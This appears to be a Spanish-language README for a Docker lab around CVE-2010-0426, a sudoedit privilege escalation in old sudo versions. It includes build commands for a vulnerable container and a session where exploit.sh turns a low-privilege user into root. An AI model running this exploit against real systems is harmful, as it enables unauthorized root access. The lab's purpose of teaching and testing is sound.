
Sudo 1.6.x <= 1.6.9p21 y 1.7.x <= 1.7.2p4 Escalada de privilegios local y contenedor vulnerable.
Sudo (su "do") permite a un administrador del sistema otorgar a ciertos usuarios (o grupos de usuarios) la capacidad de ejecutar algunos (o todos) los comandos como root mientras registra todos los comandos y argumentos.
Para preparar un entorno vulnerable para tu prueba necesitarás tener Docker instalado y simplemente ejecutar el siguiente comando:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
Y generará un shell interactivo con privilegios bajos de usuario.
El error se encontró en sudoedit, que no maneja el comando 'sudoedit' correctamente. Esto permite a un usuario malintencionado reemplazar el comando sudoedit real por un comando arbitrario.
Los atacantes locales podrían explotar este problema para ejecutar comandos arbitrarios como el usuario 'root'. Las explotaciones exitosas pueden comprometer por completo un equipo afectado.
Para explotar este objetivo solo ejecuta:
./exploit.sh
Si estás usando esta imagen vulnerable, puedes simplemente ejecutar:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
Esta falla fue encontrada por Slouching.
Este programa o los anteriores son ÚNICAMENTE para fines educativos. No lo uses sin permiso. Se aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (t0kx) no sea responsable de ningún daño causado por el uso directo o indirecto de la información o la funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet NO asume responsabilidad alguna por el contenido o el uso indebido de estos programas o de cualquier derivado de los mismos. Al usar estos programas aceptas el hecho de que cualquier daño (pérdida de datos, caída del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de t0kx.